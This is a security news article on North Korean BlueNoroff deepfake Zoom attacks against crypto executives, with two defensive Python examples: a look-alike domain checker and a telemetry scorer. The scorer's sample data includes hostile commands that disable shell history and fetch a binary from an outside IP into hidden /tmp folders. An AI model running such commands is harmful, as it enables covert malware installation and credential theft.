North Korean deepfake Zoom scam targets crypto execs in minutes

By Craig Nash
AI-powered tech writer covering artificial intelligence, chips, and computing.

A sophisticated deepfake Zoom scam linked to North Korean hackers is targeting cryptocurrency executives with alarming speed and precision. The attack, attributed to the hacking group BlueNoroff (also tracked as TA444, STARDUST CHOLLIMA, and UNC1069), compromises high-value targets in under five minutes by combining social engineering, AI-generated video deepfakes, and malware deployment. Security researchers at Huntress identified the campaign after discovering at least eight malware payloads on a compromised Web3 employee’s machine, revealing a coordinated operation that has stolen over $300 million from crypto organizations.

Key Takeaways

  • BlueNoroff hackers use compromised executive accounts to send fake Calendly meeting invites that redirect to fraudulent Zoom domains.
  • Deepfake video feeds of senior executives appear in the fake Zoom session and request installation of malicious software.
  • Malware payloads steal Keychain credentials, browser cookies, Telegram sessions, and cryptocurrency wallet information.
  • North Korea-linked actors now account for 76% of all global crypto service compromises, stealing $2.02 billion in 2025 alone.
  • The entire attack sequence from initial contact to credential theft completes in under five minutes.

How the deepfake Zoom scam works step by step

The deepfake Zoom scam begins with someone else's stolen credentials. Attackers compromise a cryptocurrency executive's Telegram account or LinkedIn profile, then use that hijacked identity to contact secondary targets within the organization. Because the approach arrives from a trusted contact, it bypasses initial skepticism and sets the stage for the technical attack.

Once contact is established, the attacker sends a Calendly link for what appears to be a legitimate 30-minute video call. According to Huntress researchers, “The Calendly link was for a Google Meet event, but when clicked… redirects the end user to a fake Zoom domain controlled by the threat actor.” The fake domain mimics legitimate Zoom infrastructure. One example identified was “support.us05web-zoom.biz”: real Zoom meeting hosts such as us05web.zoom.us are subdomains of zoom.us, whereas the look-alike keeps the familiar “us05web” label but sits under the registrable domain us05web-zoom.biz, which Zoom does not own. To the untrained eye the two read the same.

When the victim joins the session, they encounter deepfake video feeds of their own senior executives. The AI-generated deepfakes cite microphone troubles or technical issues, creating urgency and justifying an unusual request: installation of a “Zoom extension” packaged as a malicious AppleScript file named zoom_sdk_support.scpt. The victim, believing they are troubleshooting a legitimate meeting, complies.
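The look-alike trick above works because the word “zoom” is in the hostname but not in the part of the name that anyone had to register. The following checker, added here as an example and not code from the article, Huntress or Zoom, makes that distinction explicit: it extracts the registrable domain of a link and reports whether the link is really Zoom's, a look-alike that merely contains “zoom”, or some other platform. The set of Zoom-owned domains and the small suffix table are assumptions maintained by the defender, not a published Zoom list.

```python
"""Classify meeting links by the domain that actually owns them.

Added example for this article; it is not code from Huntress, Zoom or the
original page. ZOOM_REGISTRABLE holds the registrable domains Zoom serves
meetings from; MULTI_LABEL_SUFFIXES is an illustrative subset of the public
suffix list, not a complete one.
"""
from urllib.parse import urlsplit

# Registrable domains Zoom meeting and SDK hosts live under (us05web.zoom.us,
# app.zoom.us, developers.zoom.us, ...). Maintained by the defender, not Zoom.
ZOOM_REGISTRABLE = {"zoom.us", "zoom.com"}

# Suffixes under which registrars sell third-level names, so the registrable
# domain is three labels long (example.co.uk). Illustrative subset only.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}


def registrable_domain(host: str) -> str:
    """Return the registrable domain (eTLD+1) of a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return host.lower()
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify_meeting_link(url: str) -> dict:
    """Return the host, its registrable domain and a verdict for a link.

    verdict is 'zoom' when the registrable domain is Zoom's, 'lookalike'
    when 'zoom' appears in the hostname but the registrable domain is not
    Zoom's (support.us05web-zoom.biz, zoom.us.attacker.example), and
    'other' for any other platform.
    """
    if "://" not in url:            # bare hostnames pasted from chat
        url = "https://" + url
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:                            # decode IDNA so homoglyph labels are inspected too
        decoded = host.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        decoded = host
    reg = registrable_domain(host)
    if reg in ZOOM_REGISTRABLE:
        verdict = "zoom"
    elif "zoom" in host or "zoom" in decoded:
        verdict = "lookalike"
    else:
        verdict = "other"
    return {"host": host, "registrable": reg,
            "https": parts.scheme == "https", "verdict": verdict}


if __name__ == "__main__":
    for link in ("https://us05web.zoom.us/j/1234567890",
                 "https://support.us05web-zoom.biz/sdk",
                 "https://zoom.us.attacker.example/j/1",
                 "https://meet.google.com/abc-defg-hij"):
        print(f"{classify_meeting_link(link)['verdict']:9} {link}")
```

The check has to be applied to the address the browser actually lands on, not to the Calendly link in the invite: the invite itself points at a legitimate Calendly page, and the redirect to the look-alike happens afterwards. A full public suffix list should replace the small table before this is used on real traffic.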

The malware payload and data exfiltration

Once executed, the AppleScript opens a legitimate Zoom SDK page to maintain the illusion of legitimacy. Behind the scenes, it fetches a shell script that disables bash history logging, so the commands it goes on to run are never written to the history file; checks for Rosetta 2 and installs it silently, so that Intel-built payloads can run on Apple silicon Macs; and creates a hidden “.pwd” file. The script then downloads multiple malicious binaries to a hidden directory (“/tmp/icloud_helper”) while prompting the user for their system password.

Huntress identified eight distinct malware payloads on the compromised machine, each with a specialized function. Between them, these tools steal Keychain credentials (the macOS credential store), extract browser cookies and saved logins, lift Telegram session data, target cryptocurrency wallet data, capture clipboard contents, and erase forensic traces. Mandiant, investigating a similar intrusion at a fintech crypto company, identified seven distinct malware families attributed to the same group, confirming this is not an isolated incident.

The speed of the attack is remarkable. From the moment the victim clicks the Calendly link to the completion of malware installation and initial data exfiltration, the entire process unfolds in under five minutes. This compressed timeline leaves little room for detection or manual intervention, which is why the campaign has proven so effective against even security-conscious organizations.

North Korea’s expanding crypto theft operation

The deepfake Zoom scam is part of a much larger North Korean cyber operation targeting cryptocurrency infrastructure globally. According to Chainalysis data, North Korean-linked actors stole $2.02 billion in digital assets in 2025, representing a 51% year-over-year increase from $1.34 billion in 2024. More concerning, these operations now account for 76% of all global crypto service compromises, up from historical averages.

The cumulative lower-bound estimate of DPRK crypto theft has surpassed $6.75 billion. Specific targets have included a Polygon co-founder, BTC Prague organizer Martin Kuchař, and founders of AI startups, suggesting BlueNoroff is systematically mapping high-value individuals across the crypto ecosystem. The shift from basic phishing emails to AI-generated deepfakes represents a significant escalation in sophistication and operational capability.

This evolution mirrors a broader pattern in North Korean cyber operations. Attackers have moved beyond credential harvesting toward real-time video manipulation, using deepfakes to overcome human skepticism in ways that static emails cannot. The technique is particularly effective against remote workers who are accustomed to video calls but may not yet recognize deepfake artifacts in compressed video streams.

Defense strategies and warning signs

Security researchers warn that unfamiliar calendar links, sudden platform changes, or requests to install new software are red flags. The most reliable defense remains direct verification: if you receive an unexpected meeting invite from a colleague, call them directly using a known phone number to confirm before clicking any links. Do not rely on phone numbers or contact details in the invite or in the message that delivered it, since that channel may itself be the compromised one.

Huntress researchers emphasize the human element: “Remote workers, especially in high-risk areas of work, are often the ideal targets for groups like TA444… It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.” Organizations should implement mandatory security training focused on meeting platform impersonation, credential verification procedures, and the dangers of installing unexpected software during video calls.

Technical controls also matter. Endpoint detection and response (EDR) tools should flag AppleScript execution from unexpected sources, particularly scripts that disable shell history, install Rosetta 2 unattended, or download binaries to hidden directories. Browser isolation keeps session cookies off the endpoint, and conditional access policies that require a managed device and phishing-resistant MFA limit what an attacker can do with stolen Keychain entries and cookies. Because the payloads lift live sessions rather than just passwords, revoking active browser and messaging sessions after a suspected compromise closes the window in which the stolen session data remains valid.
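The behaviours the article lists (an AppleScript launched from a download folder, shell history switched off, a silent Rosetta 2 install, downloads into a hidden /tmp directory, a password prompt) are individually noisy but collectively distinctive, and they arrive within a few minutes of each other. The scorer below, added here as an example and not Huntress's detection content or code from the article, turns that into a windowed rule set over a process-start feed. The feed format, the sample lines and the rule weights are constructed for this example; the password-prompt rule assumes the prompt is raised with AppleScript's `display dialog ... with hidden answer`, which the article does not specify.

```python
"""Score macOS process telemetry for the behaviour chain described above.

Added example; it is neither Huntress's detection content nor code from the
article. The feed format (timestamp user parent command-line), the event
lines and the rule weights are constructed for this example and do not
follow any vendor's schema.
"""
import re
from datetime import datetime, timedelta

# Constructed sample feed. The lines for user alice mirror the chain in the
# article; the lines for bob show the rules staying quiet on routine admin
# work (a Rosetta install on its own, a harmless AppleScript dialog).
SAMPLE_EVENTS = [
    "2025-06-11T14:02:03Z alice Terminal.app /bin/zsh -c 'brew update'",
    "2025-06-11T14:05:10Z alice Finder osascript /Users/alice/Downloads/zoom_sdk_support.scpt",
    "2025-06-11T14:05:11Z alice osascript /usr/bin/open https://developers.zoom.us/docs/",
    "2025-06-11T14:05:12Z alice osascript /bin/sh -c 'unset HISTFILE; export HISTFILE=/dev/null'",
    "2025-06-11T14:05:14Z alice sh softwareupdate --install-rosetta --agree-to-license",
    "2025-06-11T14:05:15Z alice sh /bin/sh -c 'mkdir -p /tmp/icloud_helper; curl -s http://198.51.100.23/helper -o /tmp/icloud_helper/helper; touch /tmp/icloud_helper/.pwd'",
    "2025-06-11T14:05:20Z alice sh osascript -e 'display dialog \"Zoom SDK needs your password\" default answer \"\" with hidden answer'",
    "2025-06-11T14:40:00Z bob Terminal.app osascript -e 'display dialog \"Build finished\"'",
    "2025-06-11T14:41:00Z bob Terminal.app softwareupdate --install-rosetta --agree-to-license",
]

# (rule name, weight, pattern matched against the command line)
RULES = [
    ("osascript-from-user-dir", 3,
     re.compile(r"^osascript\b.*/(?:Downloads|Desktop|tmp)/\S*\.scpt\b")),
    ("history-disabled", 3,
     re.compile(r"unset HISTFILE|HISTFILE=/dev/null|set \+o history|history -c")),
    ("silent-rosetta-install", 2,
     re.compile(r"softwareupdate\b.*--install-rosetta")),
    ("download-to-tmp", 2,
     re.compile(r"\b(?:curl|wget)\b.*\s-[oO]\s*/tmp/")),
    ("hidden-file-in-tmp", 2,
     re.compile(r"/tmp/(?:[^/\s]+/)*\.[^\s/;]+")),
    ("password-dialog", 3,
     re.compile(r"display dialog\b.*with hidden answer")),
]


def parse_event(line: str) -> dict:
    """Split one feed line into timestamp, user, parent process and command."""
    ts, user, parent, cmd = line.split(" ", 3)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user, "parent": parent, "cmd": cmd}


def match_rules(event: dict) -> list:
    """Return (name, weight) for every rule whose pattern hits the command."""
    return [(n, w) for n, w, p in RULES if p.search(event["cmd"])]


def score_events(lines, window=timedelta(minutes=5), threshold=7) -> list:
    """Slide a per-user window over the feed and alert when the distinct
    rules hit inside the window sum to at least threshold.  Each rule counts
    once per window, so one repeated noisy command cannot trip the alert."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    by_user = {}
    for e in events:
        by_user.setdefault(e["user"], []).append(e)
    alerts = []
    for user, evs in by_user.items():
        best = None
        for i, start in enumerate(evs):
            hits, first = {}, None
            for e in evs[i:]:
                if e["ts"] - start["ts"] > window:
                    break
                for name, weight in match_rules(e):
                    hits[name] = weight
                    first = first or e["ts"]     # time of the first rule hit
            score = sum(hits.values())
            if score >= threshold and (best is None or score > best["score"]):
                best = {"user": user, "start": first, "score": score,
                        "rules": sorted(hits)}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in score_events(SAMPLE_EVENTS):
        print(f"{a['user']} {a['start'].isoformat()} score={a['score']} {a['rules']}")
```

The five-minute window matches the timeline the article gives for the whole chain; a longer window catches slower variants at the cost of more benign overlap. Any single rule here will fire on legitimate developer activity, which is why the alert is on the combination rather than on any one line.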

Is the deepfake Zoom scam likely to target my organization?

If your organization operates in cryptocurrency, fintech, blockchain, or Web3, the risk is significant. BlueNoroff has demonstrated a clear focus on high-value crypto targets, and the campaign is active and evolving. Even if you are not a direct cryptocurrency company, any organization with executives who hold crypto assets or sit on crypto-related boards is a potential target.

What makes deepfake video harder to detect than audio deepfakes?

Video deepfakes benefit from the low bandwidth and compression artifacts of a typical call, which mask unnatural facial movements and edge glitches. In a Zoom call with multiple participants and reduced video quality, the subtle imperfections in AI-generated faces are harder to spot than they would be in a high-resolution recording. Attackers also exploit the brief, distraction-filled nature of business calls: most participants are multitasking and not scrutinizing video feeds closely.

How can I verify a meeting invite if I’m suspicious?

Call the person directly using a phone number from your company directory or a previous email thread, not from the suspicious invite. Ask them directly if they scheduled a meeting with you. If they did not, report the invite and the message that delivered it to your security team immediately. This simple step defeats the entire social engineering premise of the deepfake Zoom scam.

The deepfake Zoom scam marks a watershed moment in cryptocurrency security. North Korean operators have moved beyond harvesting passwords: they now use video impersonation to talk victims into running malware that lifts entire sessions, complete the attack in minutes, and target the individuals and organizations most likely to hold valuable digital assets. For crypto executives and remote workers in high-risk sectors, skepticism toward unexpected meeting invites is no longer paranoia; it is a required survival skill. Given the attack's speed, verification before engagement is the most reliable defense, with detection after compromise serving as a backstop rather than a substitute.

This article was written with AI assistance and editorially reviewed.

Source: TechRadar
